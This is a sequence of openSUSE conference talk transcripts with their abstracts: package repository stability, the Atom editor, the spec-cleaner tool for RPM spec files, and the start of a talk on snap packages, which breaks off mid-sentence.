package is broken, when the project is broken? Easy answer, here's the solution: the devel maintainers. That's it. And we have such a mess right now because the devel maintainers can't keep up with that workload. Yeah. So you obviously have picked the most stupid example.
I mean, adding devel:languages:perl or devel:languages:python or something like that to your machine, when you're not a hardcore Perl developer, or even then, is certainly not going to work, because it has some 5,000 packages in there and obviously they all affect the base system. So this will obviously not work. For the purpose of this example, I was a user who just wanted Elasticsearch. I didn't want Python, I didn't care about the modules, all I wanted was Elasticsearch. Yes. So what do we need to do? Maybe Lars and I are lucky, because our devel repositories actually are not devel repositories: Lars's is Education, it's not devel:Education, it's Education, so it's not a devel repository. My pet repository is VDR, the video disc recorder repository; it's also not a devel repository by name. We're just lucky because they're old enough: they were created before the namespace was cluttered with devel. And one example is the VDR repositories; there are two of them, VDR and VDR plugins. And there's no way I'm ever going to submit the VDR plugins to Factory, because that's just too much humiliation I'm going to have to endure trying to get this code in there. The code is still useful and it works, from the older releases through Leap to Tumbleweed, because I tested there. And so maybe what we need... I can follow you that we don't want the real hard, die-hard devel repositories added to everyone's machine. But we really do need somewhere where people can say: okay, this is somewhat stable, you have to trust us as developers that we keep it somewhat stable. We will probably not update glibc in our repository or something like that, some stupid stuff. But just the Education repository, or sometimes also the Games repository, is one of those where we occasionally fix stuff. I'll accept your point a bit, because something like the VDR repository might be a prototype for what could end up being called a stable repository in the future. But then we still need to answer these other questions. You do it yourself right now, and everybody is just expected to trust you. No: let's have some standards, let's have some criteria, some quality controls, so that when somebody says "I'm doing this in my stable repository", it really is good enough. One last question; I think Ralph had his hand up. I have a question. I think the main reason that caused the problem with Elasticsearch is that it ended up in the wrong repository. It should never have been in a Python repository; it's a Java project. It should be, in my opinion, in a logging project. And I think projects like these are useful: I also maintain stuff in Games, in Monitoring, in Security, and I think these are all useful projects. And yes, I agree that it's a lot of extra work to maintain it. And if you also push it upstream into the distributions... I mean, I have a project like Cacti, and it causes a lot of work because I pushed it up; now when I have to do an update, I have to update it in all the different openSUSE versions. If it were only in Monitoring, it would be a lot less work for me. And that's a fair point. But then we need our maintainers to stop treating devel projects just like a dumping ground, like they are right now. If we want them to be used by users, we need to be worrying about which one a package is in, how somebody is going to consume it, how this is actually meant to work in the real world, not just on our developer machines. But isn't it up to the maintainers to decide if a package belongs there? I think they should have rejected the submit request in Python.
I'm not so sure. So, listening carefully, and I'm not a packager or developer here, so I'm definitely coming from the user side: I think you're trying to bring two teams, or maybe even three different categories, together with one slide deck. And I think that's the problem, because I can also see that what an upstream maintainer wants from our tools is different, and they define success differently, than what a distro package developer wants and what a user wants. So maybe if you change the wording a little bit and don't call it "stable"; you know, with "stable" you associate a lot of criteria, being really quality-stamped and all of that, and that might be too much for somebody who in his free time makes VDR work, right? Maybe the trick is using a different term: there's an apps repo, or there's a leaf-package repo, because leaf packages, as some people said, will not mess around with base dependencies. And there is this criterion: it's good enough, somebody has tested it, so I can install it. For a leaf package, I think that's fine. Pushing it to Factory is maybe asking for too much, or applying all these things... But if it's a leaf package, it's very easy to push to Factory. That's, you know, where we are. But if you then ask for all these additional things, it has to pass this thing and it has to pass all of these other things, and, like somebody said, what is the benefit for me as the guy who packages it in his free time? If I don't have a benefit from it, then why should I do it? So I can understand that. At the same time, I think there are really good ideas in there. And maybe it's not my thing versus your thing; there is middle ground. There are these leaf packages, which are nice to have on as many distributions as there are users for. And if build power is a problem, we can talk about that. But matching developer and user in one slide deck is a difficult problem, I think. It is. But that's the reason I did this slide deck, actually: because I think we've forgotten what our users are suffering because of the decisions we've made as developers. So I totally agree with the first 35 slides. Thank you. And I've already run five minutes over, so thank you very much.
openSUSE has a wonderful platform with OBS, and tools like software.opensuse.org and 1-Click installs make it very easy for users to get additional software on their machines. This talk will discuss how this is quite often a very bad thing, leading to problems for users as well as extra work for maintainers in both the short and long term. It will discuss the benefits of putting software packages in both of openSUSE's distributions (Leap & Tumbleweed) and propose concrete steps which users and responsible package maintainers can take to ensure everything is put together and working as smoothly as possible. Finally, the session will accept the reality that putting absolutely everything in a distribution is infeasible and discuss possible criteria and guidelines for sensibly defined, maintainable additional repositories that avoid the issues raised earlier in the session.
10.5446/54444 (DOI)
Okay, hello everybody. My name is Ladislav Slezák, I'm a member of the YaST team. In this short presentation I will show you the Atom editor and some features which I like, so maybe you can try it and use it. The Atom editor has a motto: "A hackable text editor for the 21st Century." Let's see if that's true. I have just two slides and I will show the rest live in the demo, so we can see how it works. So, a short introduction: Atom is an open source project, it was started by GitHub, and currently there is a large community around it, and it has many ways to be extended. Think of it as a modern editor which, if you look at it, is similar to Sublime Text or TextMate. There is a plugin which allows importing syntax highlighting definitions from TextMate, so there are some similarities. They focus on both kinds of users: the writers, in essence, who write code or text in the editor, and also the programmers who develop the editor itself, extend it with plugins, write new UI themes and so on. They also use the term "hackable to the core", so I will show something about that later. If you want to install it, there are pre-built packages at atom.io. You just download the RPM and install it. I suggest using zypper, because it has some additional dependencies on packages which are not installed by default; they are just some small packages, so zypper makes it easier. Or you can build it from sources, but that's quite complicated. There was some Hack Week project to build it in OBS, but I don't know how it ended; I haven't seen the packages in OBS yet. As I mentioned, it's extensible via plugins; unfortunately they call them, again, packages, so it's sometimes confusing. And the package manager has a command-line tool, apm. So for example, for the packages or extensions I will present, which I like and have marked with a star, there is a command which installs all the packages I have starred, so this way you can quite easily install a bunch of plugins onto a base installation. So let's start with some demos, so you can see some nice features. And one disclaimer: it doesn't mean that you should drop your fine-tuned Emacs or Vim configuration or whatever. Personally, I sometimes still use Vim, because for example if I want to edit just one single file, one small change, it doesn't make sense to run this full-blown editor; running Vim is much faster. It does not work for all cases; in some cases other tools are still better. I have several projects open and I will switch between them to show some specific features. This is how the Atom editor looks: the usual editing area with some file navigation, some menus and a status bar, just like many others. So I will show some interesting features which make it stand out. For example, I have this Markdown file. Markdown is quite popular these days and it is used in many places, on GitHub especially, where they write documentation in it. As you can see, it has nice syntax highlighting, which is nothing unusual, but it has a nice feature which is live preview, which means you can easily see the rendered version including images. And there are some nice shortcuts: if you want to add a table, you just write that, and then you can easily add some headers, change the titles, and you will immediately see the results.
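The install step he describes fits in a couple of commands; a sketch (the RPM file name is whatever you downloaded from atom.io, and installing your starred packages may first need an "apm login" with an API token):

    sudo zypper install ./atom.x86_64.rpm   # zypper pulls in the extra dependencies mentioned above
    apm install minimap                     # install a single Atom package by name
    apm stars --install                     # install every package you have starred on atom.io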
So if you are editing Markdown quite a lot, it's useful, especially if the file has some huge structure, many sub-items, tables and so on; if you can see the live preview, it makes it easier. If you change something, you will immediately see some markers on the left side. A green plus means it's new code, because it tracks the changes compared to the current Git checkout. If you change something, it can compare it with the current HEAD state. If you remove something, you will see a minus; if you modify something, you will see an orange bullet. The nice feature is that if you're doing some changes and suddenly you think, I want the original text back, you just click the icon and you can easily revert back to the original state, or easily restore a removed section. So if you are doing some changes and you want to go back, you can do it quite easily. It has some nice navigation: if you press Ctrl+R, it will show you the main headers, so you can easily switch to the section you need, or you can even type something and it will search, so you can easily find your section. And this indexing also works in Ruby and C++ files, or actually any file type which supports this feature or has a plugin for it, so you can navigate really quickly. Another feature which I like is the open-on-GitHub feature. For example, in the YaST team we communicate via IRC, and sometimes you need to send a location in a file to a colleague, like: hey, something doesn't work for me, do you know where this is or how it's defined? Usually you would somehow need to point to the file and paste that into IRC. The nice feature is that you can open it directly on GitHub. And the most interesting thing, which I actually forgot to mention at the beginning, is that every command defined in Atom is listed in the so-called Command Palette. If you press Ctrl+Shift+P, you will see this menu, and it lists all the commands defined in Atom. That's a pretty nice feature. For example, in Vim there are many features, but if you don't know them, you can't find them, or you have to google and look in the manual, which is quite difficult. Here you can simply open the list, start typing, and it will find it. So if you type "github", you have several options, and if there is a shortcut, you can see it on the right side, so you can learn the shortcut quite easily. Here I use the first one, which is for the file. If I press it, I will immediately see the same file and the same line on GitHub, so you can copy and paste it to IRC. Actually, you don't have to copy and paste, because there is another option which copies the link directly to the clipboard, so you can just paste it and that's it. For many languages there are so-called linters. That means that while you are typing, some checks run in the background. For example, in Ruby, if you write something like this, it will immediately complain that there is an assigned but unused variable. So if you are writing some code and you forget something, you will immediately see some warnings in the code. There are even plugins, for example, for RuboCop, so it could immediately tell you: hey, there is one extra space, or there is one space missing. But actually I don't use that one, because I'd rather run the RuboCop auto-correction and it fixes this for me. So yeah. And another nice feature is the docblock plugins. So if you write documentation comments...
Unfortunately in this file there are already some comments, but if you start like this and press Tab, it will immediately pick up the parameters, and you can just rewrite the default descriptions, so you can easily document your code without writing and copying the parameter names and so on. Unfortunately this currently doesn't work for Ruby; C++ and, I think, Python are supported, but unfortunately Ruby, which we use in YaST, is not. As I said, many features are provided by plugins. For example, there is a Travis plugin, so there is this small green icon. Again, if you click for the details, it will immediately open the log on Travis. So if the build fails, you will see a red icon there; just by clicking it you will immediately see the log and you can find out why it failed and what was wrong. And the last feature I'll mention is actually a plugin which I built myself during Hack Week. In two days I was able to do a simple plugin which opens links. So if you put your cursor on some Bugzilla number and press a shortcut, the bug report is immediately opened. And it works also in the code: if there is a comment in the code referring to Bugzilla, it opens this bug immediately. And it supports many others, even FATE and other bug reporting tools. So you just press a shortcut and you can immediately see what the feature or bug is about. And that was quite easy to implement. So now let's switch to the hackability features. The most interesting thing is this: the developer tools. You are probably very familiar with them, and they actually reveal how it all works, because as you can see, it's basically the page inspector from the Chrome browser, and it means that the whole thing is a single web page application running inside a modified Chrome environment. Everything is done basically in JavaScript, HTML and CSS. So if you are familiar with these technologies, if you are familiar with web development, then you can quite easily hack on Atom, write plugins and so on. It's quite convenient, and it ensures that there is quite a huge pool of developers, or potential developers, behind this. It also means you can use normal npm packages for Node.js. Take the Travis icon: it does not implement the whole functionality from scratch, it uses the standard Travis npm package, and it's just a small wrapper around it. The Travis communication had already been implemented in some package; in this case they just wrapped it and only did the icon and the UI stuff, but the core was already there and they just used the package. That means you can quite easily introduce a new feature without implementing all the stuff around it. And since it's HTML and CSS, you can quite easily change the UI. If you don't like the default style (by the way, this is not the default; the default is dark, I use this light theme), you can change whatever you want in the UI. For example, using this navigator you just need to find the right class names, or the path to the widget in the tree, but basically it's just like changing the UI of a web page. So I have some examples. If I uncomment this and save, the status bar at the bottom changes its color to black. I save it, comment it out again, and it's restored. Another example is the close icon here on the tabs. You can see that close icon, but maybe you want to change the color, you want to make it more visible. So you can quite easily change it to a red color, or even make it bigger, so now it's more visible.
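Those UI tweaks live in the user stylesheet, ~/.atom/styles.less; a sketch of the kind of rules being toggled in the demo (the selectors below are illustrative only; use the developer tools inspector, as he does, to find the real class names in your Atom version):

    cat >> ~/.atom/styles.less <<'EOF'
    // make the status bar at the bottom black
    status-bar {
      background-color: black;
    }
    // make the tab close icon red and a bit bigger
    .tab .close-icon {
      color: red;
      font-size: 14px;
    }
    EOF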
And then you can just add some padding at the top, so it looks better. So that's it; this way you can quite easily change the UI and make it look as you wish. Or you can define a completely new theme: if you don't like the color scheme, you can quite easily create a new one from scratch. Actually there is a generator which creates a template for you, so you can create a theme package quite easily. The last example is about the cursor: again, you can change it to red, change the width; one pixel is probably not visible, so let's make it this wide. So you can change the UI very easily. So yeah, that's about changing the style. Of course you can also extend the functionality. By default there is an init file which is loaded at startup. I have just a short example which defines a new command, lipsum:insert, which inserts some text into the active text editor. For this we need to restart the editor, because this file is not reloaded automatically. So we restart it, and then we can see our command in the menu, and if we run it, the text is added. Having a command is nice, so what about a keyboard shortcut? There's another config file where you can define your shortcuts, either for commands which don't have any shortcut assigned, or to change existing ones, because sometimes you are used to some keyboard shortcut and you want to keep using the same one, so you can redefine it. Another use case is that some plugins might conflict, because there are currently thousands of plugins, and sometimes you find that two or more of them use the same shortcut; here you can redefine it. So we assign Ctrl+Shift+Q, restart the editor, and now whenever we press that shortcut, the text is added. So that's a very simple way to extend the editor. If you want to publish your changes, or bigger changes, then it's convenient to start a new plugin. Instead of changing your local configuration, you can create a plugin, which is quite easy, because there is a plugin which generates new plugins; you can quite easily create a template for the new package, you don't have to start completely from scratch. This is the Bugzilla bug number opener which I mentioned earlier. The last thing I'd like to show is that if you write plugins, you can write tests for them. So if you press a shortcut, it will run them. Unfortunately, this plugin was written about two years ago and the test doesn't pass in the latest Atom, even though the plugin itself works, as you have seen; it's just some initialization bug. But what I wanted to show is that even for your plugins you can write integration tests and run them on Travis, which I do for this plugin, which is pretty cool, because for many Vim or Emacs plugins there are no tests, no way to ensure that they work. With Atom you can write nice plugins, properly test them, and even use nice continuous integration with Travis. So whenever you get a request from someone to change something, you can be sure that the tests still pass and it doesn't break. This is a really cool feature I like. So that's basically it; I could continue for quite a long time, but I wanted to show you just the most interesting parts. The best way is to simply download and install it and try it for yourself. There are some links, but I will put them into the slides, because I already mentioned them in some of my previous blog posts, so you can look there. And if you don't have questions... any questions, please? No? Thank you.
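The two config files from that part of the demo boil down to something like this minimal sketch (the inserted text and the selector are just examples; the command and keybinding names mirror the ones used in the talk):

    cat >> ~/.atom/init.coffee <<'EOF'
    # define a custom command that inserts some placeholder text into the active editor
    atom.commands.add 'atom-text-editor', 'lipsum:insert', ->
      atom.workspace.getActiveTextEditor()?.insertText('Lorem ipsum dolor sit amet.')
    EOF

    cat >> ~/.atom/keymap.cson <<'EOF'
    # bind the new command to Ctrl+Shift+Q inside text editors
    'atom-text-editor':
      'ctrl-shift-q': 'lipsum:insert'
    EOF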
Thank you.
This is a short introduction to the Atom text editor. The authors describe it as "A hackable text editor for the 21st Century". It is an open source editor originally developed by GitHub but with a large community around it. In this talk I will describe my experience with the editor and highlight some interesting features. I will also briefly mention what the "hackable to the core" feature means.
10.5446/54447 (DOI)
So, hello, everybody. I am Tomáš Chvátal, and I will give you some short information about what spec-cleaner is, what our plans are, and basically how much we can mess up your life with your package. So firstly, what actually is spec-cleaner, or speccleaner, or however you would like to call it? It's our tool that makes sure that all the packages we are producing in our distribution look more or less the same. You can ensure that all the definitions are in the same place across the board, that the conditionals are in one location, that all the dependencies are sorted in some specific order; alphabetically now, I think, but it can be changed. So if you desire some change there, you can basically say that A should always be on line 32 and it will really be there. After that, we also use it to fix common issues. For example, we have plenty of packages that have conditionals from SLE 9 or SLE 10 ensuring that they build on POWER. That's kind of useless for current Tumbleweed or SLE 15, so spec-cleaner finds them, detects them and wipes them out. Alternatively, it also replaces some old commands with their new versions, so you can remove the cruft. So in case you are, for example, the maintainer of the Perl codebase in openSUSE, you can decide that certain calls are no longer to be used and tell spec-cleaner: this is a replacement, A for B, or even multiple variables, and it will make it happen. Now, where are we using it? We are shipping it as a package, so anybody writing packages can run it on their own by using the spec-cleaner command. The Haskell people run it for all the packages they are generating: every time they generate something from Cabal, they run it through spec-cleaner so they ensure it always looks the same. The cloud guys, actually I'm not sure exactly where they are using it, but I suppose OpenStack is somehow using spec-cleaner tied into generating the packages for Fedora and for us, as in SUSE/openSUSE. And now matejcik, one of the members of the Python team, is converting Python packages semi-automatically, using spec-cleaner with a somewhat hackish codebase, to ensure that the old Python packages can be streamlined to the new singlespec format. Now for features that people often forget we have there; these are not enabled by default, but you can have fun with them: conversions. So in case you have an old spec file, you can tell spec-cleaner to convert all the dependencies to the new syntax: pkgconfig(something), perl(something), tex(), cmake(). Basically it has a built-in list of conversions based on the currently released Leap, so now 42.2, and it will convert all the old-style dependencies to the new ones. That means that later on your package should be perfectly fine to build even on Fedora or anywhere else. One other feature that's really useful is excluding a file from spec-cleaner. Basically, in some cases you don't ever want to run it on your package; take GCC as an example, nobody would like to parse that blob at all. So you can put a comment in there and it will simply be skipped. And the last big feature is code block detection. That means you can use comments to tie something together and ensure it stays together within the spec file and won't be moved by any cleaning script.
It can be used, for example, if you have LVM: you can split it into multiple parts and have common code blocks that are detected by spec-cleaner, ensuring that they stay the same. You can see it now in the distribution if you check the LVM2 package: there are three spec files and they all have the common code blocks in there. Basically they can be considered conditionals, but they are comments instead. And the last feature that spec-cleaner has, compared to the tool we are using now, format_spec_file, is that it has a really big test suite. At this point I am not really sure how big it is, so let's take a look. I closed the browser, unfortunately. So now 92% of the codebase is covered by tests, and there are loads and loads of them. At this point these are various spec files containing features that can appear in a spec file, and we make sure that nothing breaks when we are developing or changing things within spec-cleaner. Apart from this, basically the rest is just formatting: remove something, add something, replace something. We also have plans for spec-cleaner, which are kind of important. The first one is pretty big: we want to replace format_spec_file, and we have a GitHub issue for that. Unfortunately, we need to make sure that we are not running spec-cleaner on maintenance updates, because if you imagine a tool that does heavy changes within the spec file, even if they are not dangerous, that's something you want to avoid happening within a maintenance window, and we are currently not able to detect that in OBS, so we are figuring out how to work around it. Another issue we have: the new RPM has a new and lovely syntax for dependencies, where you can use "and", "or" and other operators, which, surprisingly, breaks all the tools we have. So that also needs a bit of work. Usually, when people are using spec-cleaner, they complain about the feature that puts curly brackets around all variables, as opposed to commands. In minimal mode this is already disabled, but I opened an issue to provide a separate option that lets the user decide themselves. So if you really hate curly brackets around variables, you will still be able to override it even on a full run. The last thing we are working on is cleaning up the preamble parsing to be more readable. It works at this point, but unfortunately the class had something like 40 kilobytes of code and it was not really readable, so we are slowly refactoring it to make it a bit more readable for anybody who wants to join in. So that's basically what spec-cleaner is, and now for how you could actually help, and why I am giving this talk. I have fixed all the issues that I or the packaging team had with it, so we are able to process all the packages we maintain and use: it can parse them, it won't break them, and it's fine. But if you are a package maintainer and the tool is breaking something for you, open a bug: we can fix it, we can create a test case, and we can make sure it never breaks again in any fashion. Apart from reporting bugs, you can of course expand the test suite, so if you know that something is constantly breaking for you, just create a pull request and basically add, into this folder in spec-cleaner, another spec file that contains the code, how it looks before and how it looks after, and that's it.
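To give a feel for what such a before/after test pair exercises, here is a tiny made-up example of the dependency conversion, plus the basic invocation (the -i flag is the in-place mode; the conversion options are opt-in, and their exact names are best checked with spec-cleaner --help):

    # before: old-style dependency in the spec file
    #   BuildRequires:  gtk2-devel
    # after: what the pkgconfig-style conversion rewrites it to
    #   BuildRequires:  pkgconfig(gtk+-2.0)
    spec-cleaner -i example.spec    # clean the spec file in place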
You don't even have to know how the spec cleaner actually works. Just before and after spec files, that's about it. Back to the proper window, come on. And also if you are the project maintainer and you want to replace something everywhere because you know everybody screwed up or majority of people screwed up or used some old macros, you can also add some replacement parts for this in the spec cleaner so it will be automatically replaced. It's actually pretty nice. The spec file is split into various areas and basically if you want to replace something in install, you just find the install section and write any code for replacements you want to do in here. Now it simply fix LA files and install command. Nothing much. But if you found some common issue in there, just a simple pull request or GitHub issue and we can make it work. The idea behind all this is to make sure that all the spec files are unified, ensure that they are running, working in correct fashion and basically in the long run, the maintenance should be easier because everything looks alike. Now how to actually find and report issues? Well, we have the GitHub page which I opened at the top so anybody can go there, report issues, create pull request, you can email me directly or you can contact us on the open Susie factory. We are basically hanging out there because there are all the packages. So apart from that, now we have four minutes so let's go for questions and if you are not working at Susie yet, as I see a lot of people here are, we are still hiring so don't be afraid to apply. So questions, anybody? Hello. I have a question on how to actually use this spec cleaner. I maintain a package or set of packages and how I'm supposed to use it. Is it run once or whenever I touch the spec file and I need to run it or would it make sense to put it in as a part of, for example, continuous integration so whenever we change something, it runs automatically or yeah. So overall you can run it on your own of course, just the spec cleaner and the parameters on the command line. Alternatively, if you've seen Peter's presentation about Haskell yesterday, basically they run it as a part of the continuous integration. They do some kable to spec and then parse it with the spec cleaner and there is also integration the same like you have the format spec file. Let's run on each commit you do in the build service if you have it installed. So the same way it can be injected as a spec cleaner, there is a package called spec cleaner, replacing something, I will have to enlarge the screen. Let's hope it will be fast. So this is the spec cleaner and this is basically shovel in replacement for the format spec file. This will ensure it will run on all your commits. Of course, the spec cleaner is more invasive than the format spec file. So you should not do it unless you really want to replace all the format spec file runs. But you can. Okay, thanks. So anybody else? Anything? I don't bite that much. Okay, so thank you for your time and have a nice rest of the conference.
How to be lazy and keep pretty spec files A short talk to discuss the plans, focus and future of the spec-cleaner tool and its incorporation in the distribution.
10.5446/54448 (DOI)
Welcome. Thanks for coming. So, snaps on SUSE. Just before we start: raise your hand if you know why I should be here, right? Okay. Raise your hand if you know what snaps are, if you've heard of snaps. Thank you. And keep your hand up if you've used them. Okay. So, hi. I'm Zygmunt. I'm working for Canonical, not for SUSE. I've been working with them since about 2010, and I've been working on Snappy for about a year, give or take, and specifically on the interface system, which we're going to get into — it's really interesting. But what matters most to me is the cross-distribution work and the advocacy for snaps just everywhere. Snaps are a universal way to run and host applications. So, just briefly — not that many people held their hand up — I'm going to describe snaps, how they function, what they look like, and specifically snaps and SUSE: where we are, what kind of things we did, and some plans for the future. And hopefully we're going to have some time for questions, but we'll see. So, snaps are packages. I keep hearing containers, containers, Docker. Snaps are packages. It's just like a package system. They're slightly different — they're not like a classic package system — but they really are packages, and you'll see quickly why. Canonical has had many interesting evolutions of the packaging system. We did the phone products, and traditional packages just didn't work very well in that setting. There's no debconf prompt you can answer, no looking at a diff on your phone; many things just didn't work. You also have to look at how the modern app stores work: everything is confined, nobody reviews applications line by line, some of them are closed or proprietary. You can't do that with classic packaging. So we had to come up with something new. So we went through the Click (with a C) packages for the phone, and then the snaps of the previous generation, which look slightly different, and now we come to snaps with snapd 2.0. So they're not like classic packages. First of all, they're read-only. It's not like you unpack your software, something lands in /var and you can change it. They're just read-only images. And since they're read-only images, we don't have to unpack them — we don't have to write to the disk, we can just mount them and start working with them. We also don't keep just a single version of a snap. So maybe I'm updating from one to another, there's a new version coming out, my system will update this application for me automatically, and it will keep multiple versions around. We call them revisions — they're not quite versions, you'll see why soon. And because we have them around on the disk, we can do delta updates: we just download the small changes that happened between one and the other, apply the delta, and mount the new thing. And that's it — that's the update. And you can also go back. And because snaps know exactly how to model data — where the application data is kept, where the user data is kept — when we do these operations we can keep the data around, copy it somewhere safe. So you get the update, and when something breaks for whatever reason — say you had an image collection application and the schema has been updated but the application doesn't work — you can say: this doesn't work for me, give me the stuff I had just a second ago.
And we'll give you back not just the code, but the actual data you had in your system, because this is also managed by snaps. And I think this is really the key thing. In today's world with security — we've been discussing security this week, and everyone seems to figure out it's important, but it's hard, it's complex, we don't really know how to do it — snaps have been trying to solve that since version one. And now with version two, it's infinitely easier to get security right, because everything is confined by default. Not only do you just get confined so you can't do certain things — everyone has the same confinement. It's predictable, it's understandable, both for developers, how to do stuff with snaps, and for users, what kind of stuff you can expect if you get a snap from somewhere and run it. I was just in a really interesting AppImage discussion, and I think that's great, but in today's world you can't afford to just get something from somewhere and run it unconfined. That's just the '90s; we just can't repeat that. And also, snaps are not containers. It's not like you get this Docker image full of ancient Ubuntu debs and run it and hope for the best. We don't have the whole system in a snap. It's not like you have to put gobs of bytes in it to actually get started — you'll see how a snap looks in a second. But this also means that because we don't bundle an operating system with a snap, a snap actually integrates into an operating system. So a snap can provide a D-Bus service, it can provide a service on a socket, it can just integrate as a service exactly as you would expect from a classic package. So snaps are different because they can work alongside the existing packages. You can work with snaps on essentially all the major distributions — whatever they're using is completely different, right? — but the same binary snap works and integrates with that distribution. It doesn't replace it, it just integrates with it. And really, I can't stress this enough: I've been packaging snapd for many distributions, and it's not easy. There's just a lot of complexity, for good reasons, in traditional classic packaging, and that's hard to get right. We're going to keep doing this for some more time until we're absolutely everywhere where there's any relevant user base, but it's not easy. And if you think of an application being packaged by a small company that wants to do something nice, something innovative, I don't want to waste their creativity on yet another Debian packaging policy. It's just crazy. Ubuntu also has PPAs, which many people use not only to distribute software but also to distribute newer software, like a new version of, I don't know, a bleeding-edge photo application — I use Darktable, so a new Darktable. PPAs are fantastic, but they also share all the drawbacks of classic packages. I can add a PPA for Darktable, and someone can steal the developer's laptop, and in that PPA a kernel can suddenly show up. It could be version 99999 — hey, I'm going to update. And I don't want to do that. I just don't want to give all that confidence and trust to every PPA, because every PPA, every extra archive I enable, just multiplies the attack surface. All of them can be owned, and all of them can ship a kernel, libc, libssl, and it could be covert — maybe no one will notice for a while. That's terrible; we don't want to repeat that. So with snaps, we've invented something way better.
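As an aside, the update-and-roll-back behaviour described a moment ago maps onto a couple of snap commands; a minimal sketch (the snap name is just a placeholder):

    # see which revisions are currently kept on disk
    snap list --all
    # go back to the previously installed revision, data included
    sudo snap revert some-app
    # updates normally just happen in the background, but can be triggered by hand
    sudo snap refresh some-app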
That something better is like a mini PPA, a mini archive, just for this one snap. And you'll see how this works soon. And this is close to my heart, because this is what I do essentially all day: snaps are heavily focused on security. There are many interesting security mechanisms we're using, and this goes all the way through the system. We are paranoid about security, and in today's world that's really relevant. So why? That's why. Not only everywhere, but everywhere — in a way, way more refined, predictable and secure way than all the other systems can do today. And yes, we have things to do, but there's nothing missing in the vision, there's nothing missing in the technology; it's just more busy work to get there. So we're going to quickly look at a simple snap package. A snap package is really, really simple — also in the way you build it. We don't have complex policies; you can just build them any way you like. We have some nice tools if you want to use them, entirely optional; you can just handcraft it. But we're going to look at a package from Snapseast.com. How does it look? It's going to be really small. It's just the application, no OS. If you need something the OS doesn't provide, well, you need to bundle it — but you don't have to bundle libc and libssl and things like that. We provide that as a base you can work on. Right now that base is just Ubuntu, but we're working heavily to give you not only one Ubuntu, but the next Ubuntu LTS and also other distributions' LTS versions. So you could start an application that works entirely on top of SLE — using SLE's libc, built with the SLE toolchain, all of that — in a way. So how does it look? Really, you don't have to read this; that's the whole thing. The only important part, I would say, is the name. A name is something you hold dear: this is how you identify yourself, this is how the world sees you, it's your copyright, your trademark, it's something you want to hold. So I could go and try to claim the name Skype, and maybe I'll be lucky and get it, and maybe the Skype and Microsoft guys are going to call us and say, you know, we're not making Skype as a snap yet, so maybe you want to pull that out. But what we can do, without changing the existing snaps, is rename them. So names are yours if you can claim them, but they're also not a firmly attached property of a snap — internally snaps don't have names, they have IDs. And interestingly, they don't have a version either. Like, oh my god, how many times do I have to look up how the Debian version ordering works? Man, I hate that. Versions are nice for people, but they don't mean anything at all anywhere in snaps; they're just a label, some simple metadata. We can use the upstream one. A storefront can give you a way richer experience in a standard way, but in the simple approach you can just stick something here, and you will see it in listings and searches and so forth. And this is interesting: you can have multiple things in a single snap. You can have MySQL, which has the daemon and also some tools like the dump tool, the CLI and whatnot. It could be a single one, it could be many. You can have services, you can have desktop apps, you can have CLI tools.
You can have hooks, which are kind of special, but you can think of them like the on-package-installation hooks that all the traditional packages have. You have to list all of them here. And what's interesting, and what we're coming to, is that all of them are confined. There's no way to break out of the sandbox. It's not like you can install a seemingly benign package and its configure script just adds an extra repository to your system — not doable. So that's how a simple snap looks: it fits on the screen with a really big font. There's nothing there, there's no OS, just what you care about. And the layout really is arbitrary — it could be whatever you want, like a mini root filesystem; we don't care. We only care about the meta directory, and inside that we have the precious snap.yaml file that carries lots of information about your snap, as well as some support files — you can have icons and a couple of other things that are not worth mentioning now. So you installed it, but how do you run it? You don't want to go and figure out where it ended up and run the binary from somewhere under /snap by hand — that's not what you want to do. snapd, when you install a snap, gives you launchers and puts them on your path. And if you look at them, they're just symlinks. We do the magic: we follow the symlink, figure out what you want to run, and run it. And it's actually not just going to run this echo command here — it's going to look at your snap.yaml and figure out the command you defined there. And these files are just available; you can have one binary and multiple ways to run it. So let's talk really briefly about building. I saw fantastic things about OBS this week; so we made our own, sorry. We have something called build.snapcraft.io, and snapcraft. Snapcraft is just an opinionated way to build snaps, but not the only one — you can really handcraft them any way you like. But it's a nice tool we provide. And snapcraft is also a nice twist on packaging. If you look at traditional packages, they're nice: if you have an autotools-based system it's super nice — almost empty, the packaging is automatic. If you use, I don't know, Python, it's also automatic. If you use Ruby, it's also automatic. But boy, try to combine them, and now you have to unwind the whole stack and figure out how to glue it together. We wanted to fix that. Snapcraft divides a package into parts. So I can say: I want to take this Git repository and build it; it's some Java code, so let's use Ant — I know nothing about Java, so maybe I'm talking rubbish. But all of these things integrate well with what they're made for. Everything that is popular either has a plugin in snapcraft, or it's really easy to build such a plugin and contribute it — many of these are community-made. And the building part is super easy: you remember the snapcraft YAML file, and you just add this to the bottom. There's going to be a part, and you can have as many as you like, and each part just says: I'm a CMake-style part, so build me the CMake way. And the code can be in many places — a Git tree somewhere, a tarball on your disk, or a tag in a repository. All that complexity is possible, but it's simple if you just take the defaults.
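Putting the pieces just described together, a minimal snapcraft YAML for such a snap might look roughly like this — a sketch only: the name, summary, command path and repository URL are made-up placeholders, and the exact keys accepted depend on the snapcraft version in use:

    name: hello-cmake            # placeholder name
    version: '1.0'
    summary: Tiny example snap
    description: A toy package used only to illustrate the format.
    grade: stable
    confinement: strict
    apps:
      hello:
        command: bin/hello       # whatever the part actually installs
    parts:
      hello:
        plugin: cmake
        source: https://github.com/example/hello.git   # placeholder URL

Running snapcraft in the directory containing this file should produce a .snap file, which can then be installed for local testing with something like snap install --dangerous ./hello-cmake_1.0_amd64.snap.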
So you have this nice snapcraft YAML. You can build it locally with snapcraft — just run snapcraft, you get a package out. Now I want to think about building it automatically when something interesting happens. So obviously we did that: we have build.snapcraft.io. And this is as easy as it gets: if your code is hosted on GitHub, as it is for many people, you click the "log in with GitHub" button, it shows you the repositories you have, the ones that have a snapcraft YAML are easy to pick, and that's it. There's no step three. So there's a whole workflow we can integrate this into — I'll talk about the last part, how to publish to the store, in a moment. The store is not just a repository, we're going to get into that, but really interesting mechanisms become possible this way. And people like snaps. We've been talking to many people making applications, and unless they've been hard-core Linux users for ages, packaging is a real problem for them. They really want to deliver desktop applications and server applications, and it's just hard. This is why Docker has had such a nice ride — because they take that away. But then you get this huge blob that's kind of impossible to audit and hard to operate. I think this is a nice middle ground, and people really like that. And now I'm going to jump to something that's super close to my heart: confinement. It's also a fantastic property of snaps that nothing else has. Confinement is not just a sandbox — it's not just one sandbox, there are many sandboxes, and everything gets a sandbox. So everything that's runnable — application, daemon, service, hook, whatever — it's all confined. And as I said earlier, it's the same confinement. You do one snap, you learn how it looks, you can now make the next snap; it's all the same. Well, obviously, if this were just as permissive as a classic application with no confinement, it wouldn't be any more secure. So the sandbox actually prevents you from doing many things. For that we have something we call interfaces, which feels like a permission system, 